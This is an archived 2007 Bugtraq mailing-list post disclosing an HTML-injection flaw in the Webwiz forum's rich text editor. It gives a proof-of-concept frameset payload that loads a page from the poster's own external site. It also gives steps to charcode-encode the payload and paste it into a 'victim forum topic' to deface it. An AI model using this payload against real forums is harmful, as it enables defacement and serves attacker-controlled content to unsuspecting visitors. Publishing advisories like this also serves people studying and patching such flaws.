Webwiz vulnerable

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Webwiz vulnerable
From: spymaster@xxxxxxxxxx
Date: 11 Jun 2007 00:43:01 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Webwiz vulnerable

Versiyon: all versions are vulnerable

Poc:

it's vulnerable because of the rich text editor it accept codes which are 
dangerous

When you hex this code with charcode it accept it and you can deface the topic 
anywhere using webwiz

the code is this

<frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0>
<frame frameborder=0 src=http://www.spykod.net/js/spy.html></frameset>

hex it with charcode
then save it as html then make ctrl a ctrl c  after it paste it to victim forum 
topic : )

spymaster@xxxxxxxxxx
www.spykod.net

Prev by Date: WinPT User ID Spoofing Vulnerability
Next by Date: [TOOL] w3af - Web Application Attack and Audit Framework
Previous by thread: WinPT User ID Spoofing Vulnerability
Next by thread: [TOOL] w3af - Web Application Attack and Audit Framework
Index(es):
- Date
- Thread